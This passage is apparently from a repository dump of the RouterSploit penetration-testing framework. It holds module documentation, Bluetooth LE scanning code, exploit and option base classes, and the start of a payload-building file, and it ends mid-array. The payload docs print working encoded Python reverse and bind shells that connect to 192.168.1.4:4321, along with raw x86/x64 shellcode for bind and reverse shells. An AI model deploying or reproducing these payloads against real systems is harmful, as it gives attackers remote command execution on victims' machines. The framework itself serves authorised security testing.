exec('ZnJvbSBzdWJwcm9jZXNzIGltcG9ydCBQb3BlbixQSVBFCmZyb20gc29ja2V0IGltcG9ydCBzb2NrZXQsIEFGX0lORVQsIFNPQ0tfREdSQU0Kcz1zb2NrZXQoQUZfSU5FVCxTT0NLX0RHUkFNKQpzLmJpbmQoKCcwLjAuMC4wJyw0MzIxKSkKd2hpbGUgMToKCWRhdGEsYWRkcj1zLnJlY3Zmcm9tKDEwMjQpCglvdXQ9UG9wZW4oZGF0YSxzaGVsbD1UcnVlLHN0ZG91dD1QSVBFLHN0ZGVycj1QSVBFKS5jb21tdW5pY2F0ZSgpCglzLnNlbmR0bygnJy5qb2luKFtvdXRbMF0sb3V0WzFdXSksYWRkcikK'.decode('base64')) ``` ================================================ FILE: docs/modules/payloads/python/reverse_tcp.md ================================================ ## Description Module generates payload that creates interactive tcp reverse shell by using python. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use payloads/python/reverse_tcp` 3. Do: `set lhost 192.168.1.4` 3. Do: `set lport 4321` 4. Do: `run` 5. Module generates python tcp reverse shell payload ## Scenarios ``` rsf > use payloads/python/reverse_tcp rsf (Python Reverse TCP) > set lhost 192.168.1.4 [+] lhost => 192.168.1.4 rsf (Python Reverse TCP) > set lport 4321 [+] lport => 4321 rsf (Python Reverse TCP) > run [*] Running module... [*] Generating payload exec('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zCnM9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pCnMuY29ubmVjdCgoJzE5Mi4xNjguMS40Jyw0MzIxKSkKb3MuZHVwMihzLmZpbGVubygpLDApCm9zLmR1cDIocy5maWxlbm8oKSwxKQpvcy5kdXAyKHMuZmlsZW5vKCksMikKcD1zdWJwcm9jZXNzLmNhbGwoWyIvYmluL3NoIiwiLWkiXSk='.decode('base64')) ``` ================================================ FILE: docs/modules/payloads/python/reverse_udp.md ================================================ ## Description Module generates payload that creates interactive udp reverse shell by using python. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use payloads/python/reverse_udp` 3. Do: `set lhost 192.168.1.4` 3. Do: `set lport 4321` 4. Do: `run` 5. Module generates python udp reverse shell payload ## Scenarios ``` rsf > use payloads/python/reverse_udp rsf (Python Reverse UDP) > set lhost 192.168.1.4 [+] lhost => 192.168.1.4 rsf (Python Reverse UDP) > set lport 4321 [+] lport => 4321 rsf (Python Reverse UDP) > run [*] Running module... [*] Generating payload exec('aW1wb3J0IG9zCmltcG9ydCBwdHkKaW1wb3J0IHNvY2tldApzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsIHNvY2tldC5TT0NLX0RHUkFNKQpzLmNvbm5lY3QoKCcxOTIuMTY4LjEuNCcsNDMyMSkpCm9zLmR1cDIocy5maWxlbm8oKSwgMCkKb3MuZHVwMihzLmZpbGVubygpLCAxKQpvcy5kdXAyKHMuZmlsZW5vKCksIDIpCnB0eS5zcGF3bignL2Jpbi9zaCcpOwpzLmNsb3NlKCkK'.decode('base64')) ``` ================================================ FILE: docs/modules/payloads/x64/bind_tcp.md ================================================ ## Description Module generates payload that creates interactive tcp bind shell for X64 architecture. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use payloads/x64/bind_tcp` 3. Do: `set rport 4321` 4. Do: `run` 5. Module generates x64 bind shell tcp payload ## Scenarios ``` rsf > use payloads/x64/bind_tcp rsf (X64 Bind TCP) > set rport 4321 [+] rport => 4321 rsf (X64 Bind TCP) > run [*] Running module... [*] Generating payload [+] Building payload for python payload = ( "\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97\x52" "\xc7\x04\x24\x02\x00\x10\xe1\x48\x89\xe6\x6a\x10\x5a\x6a\x31" "\x58\x0f\x05\x6a\x32\x58\x0f\x05\x48\x31\xf6\x6a\x2b\x58\x0f" "\x05\x48\x97\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75" "\xf6\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00" "\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05" ) ``` ================================================ FILE: docs/modules/payloads/x64/reverse_tcp.md ================================================ ## Description Module generates payload that creates interactive tcp reverse shell for X64 architecture. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use payloads/x64/reverse_tcp` 3. Do: `set lhost 192.168.1.4` 4. Do: `set lport 4321` 5. Module generates x64 reverse shell tcp payload ## Scenarios ``` rsf > use payloads/x64/reverse_tcp rsf (X64 Reverse TCP) > set lhost 192.168.1.4 [+] lhost => 192.168.1.4 rsf (X64 Reverse TCP) > set lport 4321 [+] lport => 4321 rsf (X64 Reverse TCP) > run [*] Running module... [*] Generating payload [+] Building payload for python payload = ( "\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97\x48" "\xb9\x02\x00\x10\xe1\xc0\xa8\x01\x04\x51\x48\x89\xe6\x6a\x10" "\x5a\x6a\x2a\x58\x0f\x05\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58" "\x0f\x05\x75\xf6\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f" "\x73\x68\x00\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05" ) ``` ================================================ FILE: docs/modules/payloads/x86/bind_tcp.md ================================================ ## Description Module generates payload that creates interactive tcp bind shell for X86 architecture. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use payloads/x86/bind_tcp` 3. Do: `set rport 4321` 4. Do: `run` 5. Module generates x86 bind shell tcp payload ## Scenarios ``` rsf > use payloads/x86/bind_tcp rsf (X86 Bind TCP) > set rport 4321 [+] rport => 4321 rsf (X86 Bind TCP) > run [*] Running module... [*] Generating payload [+] Building payload for python payload = ( "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80" "\x5b\x5e\x52\x68\x02\x00\x10\xe1\x6a\x10\x51\x50\x89\xe1\x6a" "\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0" "\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f" "\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0" "\x0b\xcd\x80" ) ``` ================================================ FILE: docs/modules/payloads/x86/reverse_tcp.md ================================================ ## Description Module generates payload that creates interactive tcp reverse shell for X86 architecture. ## Verification Steps 1. Start `./rsf.py` 2. Do: `use payloads/x86/reverse_tcp` 3. Do: `set lhost 192.168.1.4` 4. Do: `set lport 4321` 5. Module generates x86 reverse shell tcp payload ## Scenarios ``` rsf > use payloads/x86/reverse_tcp rsf (X86 Reverse TCP) > set lhost 192.168.1.4 [+] lhost => 192.168.1.4 rsf (X86 Reverse TCP) > set lport 4321 [+] lport => 4321 rsf (X86 Reverse TCP) > run [*] Running module... [*] Generating payload [+] Building payload for python payload = ( "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80" "\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\xc0\xa8\x01\x04\x68" "\x02\x00\x10\xe1\x89\xe1\xb0\x66\x50\x51\x53\xb3\x03\x89\xe1" "\xcd\x80\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3" "\x52\x53\x89\xe1\xb0\x0b\xcd\x80" ) ``` ================================================ FILE: requirements-dev.txt ================================================ requests==2.32.2 paramiko pysnmp==4.4.6 pycryptodome pytest==4.4.0 pytest-forked pytest-xdist flake8 git+git://github.com/threat9/threat9-test-bed telnetlib3 ================================================ FILE: requirements.txt ================================================ requests==2.32.2 paramiko pysnmp pycryptodome ================================================ FILE: routersploit/__init__.py ================================================ ================================================ FILE: routersploit/core/__init__.py ================================================ ================================================ FILE: routersploit/core/bluetooth/__init__.py ================================================ ================================================ FILE: routersploit/core/bluetooth/btle/__init__.py ================================================ from .btle_device import ( Device ) from .btle_scanner import ( BTLEScanner, ScanDelegate ) __all__ = [ "Device", "BTLEScanner", "ScanDelegate", ] ================================================ FILE: routersploit/core/bluetooth/btle/btle_device.py ================================================ import struct from bluepy.btle import ( Peripheral, ScanEntry, AssignedNumbers ) from routersploit.core.exploit.printer import ( print_table, print_success, print_status, print_error, color_blue, color_green, color_red ) from routersploit.core.exploit.utils import ( lookup_vendor ) class Device(ScanEntry): """ Single discovered Bluetooth Low Energy device """ def __init__(self, addr, iface): ScanEntry.__init__(self, addr, iface) self.vendor = None self.data = [] def _update(self, resp): ScanEntry._update(self, resp) if self.addrType == "random": self.vendor = "None (Random MAC address)" else: self.vendor = lookup_vendor(self.addr) if self.scanData: self.data = self._get_data(self.getScanData()) def print_info(self): headers = (color_blue("{} ({} dBm)").format(self.addr, self.rssi), "") if self.connectable: allow_connection = color_green(str(self.connectable)) else: allow_connection = color_red(str(self.connectable)) data = [ ("Vendor", self.vendor), ("Allow Connections", allow_connection), ] for d in self.data: data.append((d[0], d[1])) print_table(headers, *data, max_column_length=70, extra_fill=3) def print_services(self): headers = ("Handles", "Service > Characteristics", "Properties", "Data") services = self.enumerate_services() if services: print_table(headers, *services, max_column_length=70, extra_fill=3) def enumerate_services(self): print_status("Starting enumerating {} ({} dBm) ...".format(self.addr, self.rssi)) try: dev = Peripheral(self, self.addrType) services = sorted(dev.services, key=lambda s: s.hndStart) data = [] for service in services: if service.hndStart == service.hndEnd: continue data.append([ "{:04x} -> {:04x}".format(service.hndStart, service.hndEnd), self._get_svc_description(service), "", "", ]) for _, char in enumerate(service.getCharacteristics()): desc = self._get_char_description(char) props = char.propertiesToString() hnd = char.getHandle() value = self._get_char(char, props) data.append([ "{:04x}".format(hnd), desc, props, value ]) dev.disconnect() return data except Exception as err: print_error(err) try: dev.disconnect() except Exception as err: print_error(err) return None def write(self, characteristic, data): try: dev = Peripheral(self, self.addrType) services = sorted(dev.services, key=lambda s: s.hndStart) print_status("Searching for characteristic {}".format(characteristic)) char = None for service in services: if char is not None: break for _, c in enumerate(service.getCharacteristics()): if str(c.uuid) == characteristic: char = c break if char: if "WRITE" in char.propertiesToString(): print_success("Sending {} bytes...".format(len(data))) wwrflag = False if "NO RESPONSE" in char.propertiesToString(): wwrflag = True try: char.write(data, wwrflag) print_success("Data sent") except Exception as err: print_error("Error: {}".format(err)) else: print_error("Not writable") dev.disconnect() except Exception as err: print_error(err) try: dev.disconnect() except Exception: pass return None def _get_data(self, scan_data): data = [] for (tag, desc, val) in scan_data: if desc == "Flags": data.append(("Flags", self._get_flags(val))) elif tag in [8, 9]: try: data.append((desc, val)) except UnicodeEncodeError: data.append((desc, repr(val))) else: data.append((desc, val)) return data def _get_flags(self, data): bits = [] flags = int(data, 16) if self._is_bit_set(flags, 0): bits.append("LE Limited Discoverable") if self._is_bit_set(flags, 1): bits.append("LE General Discoverable") if self._is_bit_set(flags, 2): bits.append("BR/EDR") if self._is_bit_set(flags, 3): bits.append("LE + BR/EDR Controller Mode") if self._is_bit_set(flags, 4): bits.append("LE + BR/EDR Host Mode") return ", ".join(bits) def _is_bit_set(self, byteval, idx): return ((byteval & (1 << idx)) != 0) def _get_svc_description(self, service): uuid_name = service.uuid.getCommonName() if uuid_name and uuid_name != str(service.uuid): return "{} ({})".format(color_green(uuid_name), service.uuid) return str(service.uuid) def _get_char_description(self, char): char_name = char.uuid.getCommonName() if char_name and char_name != str(char.uuid): return " {} ({})".format(color_green(char_name), char.uuid) return " {}".format(char.uuid) def _get_char(self, char, props): string = "" if "READ" in props and "INDICATE" not in props: try: data = char.read() if char.uuid == AssignedNumbers.appearance: string = self._get_appearance(data) else: try: string = color_blue(repr(data.decode("utf-8"))) except Exception: string = repr(data) except Exception: pass return string def _get_appearance(self, data): appearance = { 0: "Unknown", 64: "Generic Phone", 128: "Generic Computer", 192: "Generic Watch", 193: "Watch: Sports Watch", 256: "Generic Clock", 320: "Generic Display", 384: "Generic Remote Control", 448: "Generic Eye-glasses", 512: "Generic Tag", 576: "Generic Keyring", 640: "Generic Media Player", 704: "Generic Barcode Scanner", 768: "Generic Thermometer", 769: "Thermometer: Ear", 832: "Generic Heart rate Sensor", 833: "Heart Rate Sensor: Heart Rate Belt", 896: "Generic Blood Pressure", 897: "Blood Pressure: Arm", 898: "Blood Pressure: Wrist", 960: "Human Interface Device (HID)", 961: "Keyboard", 962: "Mouse", 963: "Joystick", 964: "Gamepad", 965: "Digitizer Tablet", 966: "Card Reader", 967: "Digital Pen", 968: "Barcode Scanner", 1024: "Generic Glucose Meter", 1088: "Generic: Running Walking Sensor", 1089: "Running Walking Sensor: In-Shoe", 1090: "Running Walking Sensor: On-Shoe", 1091: "Running Walking Sensor: On-Hip", 1152: "Generic: Cycling", 1153: "Cycling: Cycling Computer", 1154: "Cycling: Speed Sensor", 1155: "Cycling: Cadence Sensor", 1156: "Cycling: Power Sensor", 1157: "Cycling: Speed and Cadence Sensor", 1216: "Generic Control Device", 1217: "Switch", 1218: "Multi-switch", 1219: "Button", 1220: "Slider", 1221: "Rotary", 1222: "Touch-panel", 1280: "Generic Network Device", 1281: "Access Point", 1344: "Generic Sensor", 1345: "Motion Sensor", 1346: "Air Quality Sensor", 1347: "Temperature Sensor", 1348: "Humidity Sensor", 1349: "Leak Sensor", 1350: "Smoke Sensor", 1351: "Occupancy Sensor", 1352: "Contact Sensor", 1353: "Carbon Monoxide Sensor", 1354: "Carbon Dioxide Sensor", 1355: "Ambient Light Sensor", 1356: "Energy Sensor", 1357: "Color Light Sensor", 1358: "Rain Sensor", 1359: "Fire Sensor", 1360: "Wind Sensor", 1361: "Proximity Sensor", 1362: "Multi-Sensor", 1408: "Generic Light Fixtures", 1409: "Wall Light", 1410: "Ceiling Light", 1411: "Floor Light", 1412: "Cabinet Light", 1413: "Desk Light", 1414: "Troffer Light", 1415: "Pendant Light", 1416: "In-ground Light", 1417: "Flood Light", 1418: "Underwater Light", 1419: "Bollard with Light", 1420: "Pathway Light", 1421: "Garden Light", 1422: "Pole-top Light", 1423: "Spotlight", 1424: "Linear Light", 1425: "Street Light", 1426: "Shelves Light", 1427: "High-bay / Low-bay Light", 1428: "Emergency Exit Light", 1472: "Generic Fan", 1473: "Ceiling Fan", 1474: "Axial Fan", 1475: "Exhaust Fan", 1476: "Pedestal Fan", 1477: "Desk Fan", 1478: "Wall Fan", 1536: "Generic HVAC", 1537: "Thermostat", 1600: "Generic Air Conditioning", 1664: "Generic Humidifier", 1728: "Generic Heating", 1729: "Radiator", 1730: "Boiler", 1731: "Heat Pump", 1732: "Infrared Heater", 1733: "Radiant Panel Heater", 1734: "Fan Heater", 1735: "Air Curtain", 1792: "Generic Access Control", 1793: "Access Door", 1794: "Garage Door", 1795: "Emergency Exit Door", 1796: "Access Lock", 1797: "Elevator", 1798: "Window", 1799: "Entrance Gate", 1856: "Generic Motorized Device", 1857: "Motorized Gate", 1858: "Awning", 1859: "Blinds or Shades", 1860: "Curtains", 1861: "Screen", 1920: "Generic Power Device", 1921: "Power Outlet", 1922: "Power Strip", 1923: "Plug", 1924: "Power Supply", 1925: "LED Driver", 1926: "Fluorescent Lamp Gear", 1927: "HID Lamp Gear", 1984: "Generic Light Source", 1985: "Incandescent Light Bulb", 1986: "LED Bulb", 1987: "HID Lamp", 1988: "Fluorescent Lamp", 1989: "LED Array", 1990: "Multi-Color LED Array", 3136: "Generic: Pulse Oximeter", 3137: "Fingertip", 3138: "Wrist Worn", 3200: "Generic: Weight Scale", 3264: "Generic", 3265: "Powered Wheelchair", 3266: "Mobility Scooter", 3328: "Generic", 5184: "Generic: Outdoor Sports Activity", 5185: "Location Display Device", 5186: "Location and Navigation Display Device", 5187: "Location Pod", 5188: "Location and Navigation Pod", } try: code = struct.unpack("h", data)[0] if code in appearance.keys(): return color_green(appearance[code]) except Exception: pass return repr(data) ================================================ FILE: routersploit/core/bluetooth/btle/btle_scanner.py ================================================ import time import binascii from bluepy.btle import Scanner, DefaultDelegate from .btle_device import Device class BTLEScanner(Scanner): """ Bluetooth Low Energy Scanner """ def __init__(self, mac=None, iface=0): Scanner.__init__(self, iface) self.mac = mac def _decode_address(self, resp): addr = binascii.b2a_hex(resp["addr"][0]).decode("utf-8") return ":".join([addr[i: i + 2] for i in range(0, 12, 2)]) def _find_or_create(self, addr): if addr in self.scanned: dev = self.scanned[addr] else: dev = Device(addr, self.iface) self.scanned[addr] = dev return dev def process(self, timeout=10.0): start = time.time() while True: if timeout: remain = start + timeout - time.time() if remain <= 0.0: break else: remain = None resp = self._waitResp(["scan", "stat"], remain) if resp is None: break respType = resp["rsp"][0] if respType == "stat": if resp["state"][0] == "disc": self._mgmtCmd("scan") elif respType == "scan": addr = self._decode_address(resp) if not self.mac or addr == self.mac: dev = self._find_or_create(addr) newData = dev._update(resp) if self.delegate: self.delegate.handleDiscovery(dev, (dev.updateCount <= 1), newData) if self.mac and dev.addr == self.mac: break class ScanDelegate(DefaultDelegate): def __init__(self, options): DefaultDelegate.__init__(self) self.options = options def handleDiscovery(self, dev, isNewDev, isNewData): if not isNewDev: return elif self.options.mac and dev.addr != self.options.mac: return if self.options.buffering: dev.print_info() ================================================ FILE: routersploit/core/bluetooth/btle_client.py ================================================ from routersploit.core.exploit.exploit import Exploit from routersploit.core.exploit.option import OptInteger from routersploit.core.exploit.printer import ( print_error, print_status ) from routersploit.core.bluetooth.btle import ( ScanDelegate, BTLEScanner ) class Options: """ Options used by the scanner """ def __init__(self, buffering, mac, enum_services): self.buffering = buffering self.mac = mac self.enum_services = enum_services class BTLEClient(Exploit): """ Bluetooth Low Energy Client implementation """ scan_time = OptInteger(10, "Number of seconds to scan for") buffering = False enum_services = False def btle_scan(self, mac=None): """ Scans for Bluetooth Low Energy devices """ options = Options( self.buffering, mac, self.enum_services ) scanner = BTLEScanner(options.mac).withDelegate(ScanDelegate(options)) if options.mac: print_status("Scanning BTLE device...") else: print_status("Scanning for BTLE devices...") devices = [] try: devices = [res for res in scanner.scan(self.scan_time)] except Exception as err: print_error("Error: {}".format(err)) print_error("Check if your bluetooth hardware is connected") return devices ================================================ FILE: routersploit/core/exploit/__init__.py ================================================ from routersploit.core.exploit.exploit import ( Exploit, multi, mute, LockedIterator, ) from routersploit.core.exploit.option import ( OptIP, OptPort, OptInteger, OptFloat, OptBool, OptString, OptMAC, OptWordlist, ) from routersploit.core.exploit.printer import ( print_info, print_status, print_success, print_error, print_table, ) from routersploit.core.exploit import utils from routersploit.core.exploit.shell import shell __all__ = [ "Exploit", "multi", "mute", "LockedIterator", "OptIP", "OptPort", "OptInteger", "OptFloat", "OptBool", "OptString", "OptMAC", "OptWordlist", "print_info", "print_status", "print_success", "print_error", "print_table", "utils", "shell", ] ================================================ FILE: routersploit/core/exploit/encoders.py ================================================ from routersploit.core.exploit.exploit import BaseExploit from routersploit.core.exploit.printer import print_error class BaseEncoder(BaseExploit): architecture = None def __init__(self): self.module_name = self.__module__.replace("routersploit.modules.encoders.", "").replace(".", "/") def encode(self): raise NotImplementedError("Please implement 'encode()' method") def run(self): print_error("Module cannot be run") def __str__(self): return self.module_name def __format__(self, form): return format(self.module_name, form) ================================================ FILE: routersploit/core/exploit/exceptions.py ================================================ class RoutersploitException(Exception): def __init__(self, msg: str = ""): super(RoutersploitException, self).__init__(msg) class OptionValidationError(RoutersploitException): pass class StopThreadPoolExecutor(RoutersploitException): pass ================================================ FILE: routersploit/core/exploit/exploit.py ================================================ import os import threading import time from itertools import chain from functools import wraps from routersploit.core.exploit.printer import ( print_status, thread_output_stream, ) from routersploit.core.exploit.option import Option GLOBAL_OPTS = {} class Protocol: CUSTOM = "custom" TCP = "custom/tcp" UDP = "custom/udp" FTP = "ftp" FTPS = "ftps" SSH = "ssh" TELNET = "telnet" HTTP = "http" HTTPS = "https" SNMP = "snmp" class ExploitOptionsAggregator(type): """ Metaclass for exploit base class. Metaclass is aggregating all possible Attributes that user can set for tab completion purposes. """ def __new__(cls, name, bases, attrs): try: base_exploit_attributes = chain([base.exploit_attributes for base in bases]) except AttributeError: attrs["exploit_attributes"] = {} else: attrs["exploit_attributes"] = {k: v for d in base_exploit_attributes for k, v in d.items()} for key, value in attrs.copy().items(): if isinstance(value, Option): value.label = key attrs["exploit_attributes"].update({key: [value.display_value, value.description, value.advanced]}) elif key == "__info__": attrs["_{}{}".format(name, key)] = value del attrs[key] elif key in attrs["exploit_attributes"]: # removing exploit_attribtue that was overwritten del attrs["exploit_attributes"][key] # in the child and is not an Option() instance return super(ExploitOptionsAggregator, cls).__new__(cls, name, bases, attrs) class BaseExploit(metaclass=ExploitOptionsAggregator): @property def options(self): """ Returns list of options that user can set. Returns list of options aggregated by ExploitionOptionsAggegator metaclass that user can set. :return: list of options that user can set """ return list(self.exploit_attributes.keys()) def __str__(self): return self.__module__.split('.', 2).pop().replace('.', os.sep) class Exploit(BaseExploit): """ Base class for exploits """ target_protocol = Protocol.CUSTOM def run(self): raise NotImplementedError("You have to define your own 'run' method.") def check(self): raise NotImplementedError("You have to define your own 'check' method.") def run_threads(self, threads_number: int, target_function: any, *args, **kwargs) -> None: """ Run function across specified number of threads :param int thread_number: number of threads that should be executed :param func target_function: function that should be executed accross specified number of threads :param any args: args passed to target_function :param any kwargs: kwargs passed to target function :return None """ threads = [] threads_running = threading.Event() threads_running.set() for thread_id in range(int(threads_number)): thread = threading.Thread( target=target_function, args=chain((threads_running,), args), kwargs=kwargs, name=f"thread-{thread_id}", ) threads.append(thread) # print_status("{} thread is starting...".format(thread.name)) thread.start() start = time.time() try: while thread.is_alive(): thread.join(1) except KeyboardInterrupt: threads_running.clear() for thread in threads: thread.join() # print_status("{} thread is terminated.".format(thread.name)) print_status("Elapsed time: {0:.4f} seconds".format(round(time.time() - start, 2))) def multi(fn): """ Decorator for exploit.Exploit class Decorator that allows to feed exploit using text file containing multiple targets definition. Decorated function will be executed as many times as there is targets in the feed file. WARNING: Important thing to remember is fact that decorator will supress values returned by decorated function. Since method that perform attack is not supposed to return anything this is not a problem. """ @wraps(fn) def wrapper(self, *args, **kwargs): if self.target.startswith("file://"): original_target = self.target original_port = self.port _, _, feed_path = self.target.partition("file://") try: with open(feed_path) as file_handler: for target in file_handler: target = target.strip() if not target: continue self.target, _, port = target.partition(":") if port: self.port = port else: self.port = original_port fn(self, *args, **kwargs) self.target = original_target self.port = original_port return # Nothing to return, ran multiple times except IOError: return else: return fn(self, *args, **kwargs) return wrapper class DummyFile(object): """ Mocking file object. Optimilization for the "mute" decorator. """ def write(self, x): pass def mute(fn): """ Suppress function from printing to sys.stdout """ @wraps(fn) def wrapper(self, *args, **kwargs): thread_output_stream.setdefault(threading.current_thread(), []).append(DummyFile()) try: return fn(self, *args, **kwargs) finally: thread_output_stream[threading.current_thread()].pop() return wrapper class LockedIterator: def __init__(self, it): self.lock = threading.Lock() self.it = it.__iter__() def __iter__(self): return self def next(self): self.lock.acquire() try: item = next(self.it) if isinstance(item, tuple): return (item[0].strip(), item[1].strip()) elif isinstance(item, str): return item.strip() return item finally: self.lock.release() ================================================ FILE: routersploit/core/exploit/option.py ================================================ import re import os.path from routersploit.core.exploit.exceptions import OptionValidationError from routersploit.core.exploit.utils import ( is_ipv4, is_ipv6, ) # pylint: disable=no-member class Option: """ Exploit attribute that is set by the end user """ def __init__(self, default, description="", advanced=False): self.label = None self.description = description try: self.advanced = bool(advanced) except ValueError: raise OptionValidationError("Invalid value. Cannot cast '{}' to boolean.".format(advanced)) if default or default == 0: self.__set__("", default) else: self.display_value = "" self.value = "" def __get__(self, instance, owner): return self.value class OptIP(Option): """ Option IP attribute """ def __set__(self, instance, value): if not value or is_ipv4(value) or is_ipv6(value): self.value = self.display_value = value else: raise OptionValidationError("Invalid address. Provided address is not valid IPv4 or IPv6 address.") class OptPort(Option): """ Option Port attribute """ def __set__(self, instance, value): try: value = int(value) if 0 < value <= 65535: # max port number is 65535 self.display_value = str(value) self.value = value else: raise OptionValidationError("Invalid option. Port value should be between 0 and 65536.") except ValueError: raise OptionValidationError("Invalid option. Cannot cast '{}' to integer.".format(value)) class OptBool(Option): """ Option Bool attribute """ def __init__(self, default, description="", advanced=False): self.description = description if default: self.display_value = "true" else: self.display_value = "false" self.value = default try: self.advanced = bool(advanced) except ValueError: raise OptionValidationError("Invalid value. Cannot cast '{}' to boolean.".format(advanced)) def __set__(self, instance, value): if value == "true": self.value = True self.display_value = value elif value == "false": self.value = False self.display_value = value else: raise OptionValidationError("Invalid value. It should be true or false.") class OptInteger(Option): """ Option Integer attribute """ def __set__(self, instance, value): try: self.display_value = str(value) self.value = int(value) except ValueError: try: self.value = int(value, 16) except ValueError: raise OptionValidationError("Invalid option. Cannot cast '{}' to integer.".format(value)) class OptFloat(Option): """ Option Float attribute """ def __set__(self, instance, value): try: self.display_value = str(value) self.value = float(value) except ValueError: raise OptionValidationError("Invalid option. Cannot cast '{}' to float.".format(value)) class OptString(Option): """ Option String attribute """ def __set__(self, instance, value): try: self.value = self.display_value = str(value) except ValueError: raise OptionValidationError("Invalid option. Cannot cast '{}' to string.".format(value)) class OptMAC(Option): """ Option MAC attribute """ def __set__(self, instance, value): regexp = r"^[a-f\d]{1,2}:[a-f\d]{1,2}:[a-f\d]{1,2}:[a-f\d]{1,2}:[a-f\d]{1,2}:[a-f\d]{1,2}$" if re.match(regexp, value.lower()): self.value = self.display_value = value else: raise OptionValidationError("Invalid option. '{}' is not a valid MAC address".format(value)) class OptWordlist(Option): """ Option Wordlist attribute """ def __get__(self, instance, owner): if self.display_value.startswith("file://"): path = self.display_value.replace("file://", "") with open(path, "r") as f: lines = [line.strip() for line in f.readlines()] return lines return self.display_value.split(",") def __set__(self, instance, value): if value.startswith("file://"): path = value.replace("file://", "") if not os.path.exists(path): raise OptionValidationError("File '{}' does not exist.".format(path)) self.value = self.display_value = value class OptEncoder(Option): """ Option Encoder attribute """ def __init__(self, default, description="", advanced=False): self.description = description if default: self.display_value = default self.value = default else: self.display_value = "" self.value = None try: self.advanced = bool(advanced) except ValueError: raise OptionValidationError("Invalid value. Cannot cast '{}' to boolean.".format(advanced)) def __set__(self, instance, value): encoder = instance.get_encoder(value) if encoder: self.value = encoder self.display_value = value else: raise OptionValidationError("Encoder not available. Check available encoders with `show encoders`.") ================================================ FILE: routersploit/core/exploit/payloads.py ================================================ import importlib from collections import namedtuple from struct import pack from routersploit.core.exploit.exploit import ( BaseExploit, ExploitOptionsAggregator, ) from routersploit.core.exploit.option import ( OptIP, OptPort, OptString, ) from routersploit.core.exploit.exceptions import OptionValidationError from routersploit.core.exploit.printer import ( print_status, print_error, print_success, print_info, ) from routersploit.core.exploit.utils import ( index_modules, random_text, ) architectures = namedtuple("ArchitectureType", ["ARMLE", "MIPSBE", "MIPSLE", "X86", "X64", "PERL", "PHP", "PYTHON"]) Architectures = architectures( ARMLE="armle", MIPSBE="mipsbe", MIPSLE="mipsle", X86="x86", X64="x64", PERL="perl", PHP="php", PYTHON="python", ) payload_handlers = namedtuple("PayloadHandlers", ["BIND_TCP", "REVERSE_TCP"]) PayloadHandlers = payload_handlers( BIND_TCP="bind_tcp", REVERSE_TCP="reverse_tcp", ) ARCH_ELF_HEADERS = { Architectures.ARMLE: ( b"\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00" b"\x02\x00\x28\x00\x01\x00\x00\x00\x54\x80\x00\x00\x34\x00\x00\x00" b"\x00\x00\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x01\x00\x00\x00" b"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00" b"\x00\x80\x00\x00\xef\xbe\xad\xde\xef\xbe\xad\xde\x07\x00\x00\x00" b"\x00\x10\x00\x00" ), Architectures.MIPSBE: ( b"\x7f\x45\x4c\x46\x01\x02\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00" b"\x00\x02\x00\x08\x00\x00\x00\x01\x00\x40\x00\x54\x00\x00\x00\x34" b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x01\x00\x00" b"\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x40\x00\x00" b"\x00\x40\x00\x00\xde\xad\xbe\xef\xde\xad\xbe\xef\x00\x00\x00\x07" b"\x00\x00\x10\x00" ), Architectures.MIPSLE: ( b"\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00" b"\x02\x00\x08\x00\x01\x00\x00\x00\x54\x00\x40\x00\x34\x00\x00\x00" b"\x00\x00\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x01\x00\x00\x00" b"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00" b"\x00\x00\x40\x00\xef\xbe\xad\xde\xef\xbe\xad\xde\x07\x00\x00\x00" b"\x00\x10\x00\x00" ), Architectures.X86: ( b"\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00" b"\x02\x00\x03\x00\x01\x00\x00\x00\x54\x80\x04\x08\x34\x00\x00\x00" b"\x00\x00\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x01\x00\x00\x00" b"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80\x04\x08" b"\x00\x80\x04\x08\xef\xbe\xad\xde\xef\xbe\xad\xde\x07\x00\x00\x00" b"\x00\x10\x00\x00" ), Architectures.X64: ( b"\x7f\x45\x4c\x46\x02\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00" 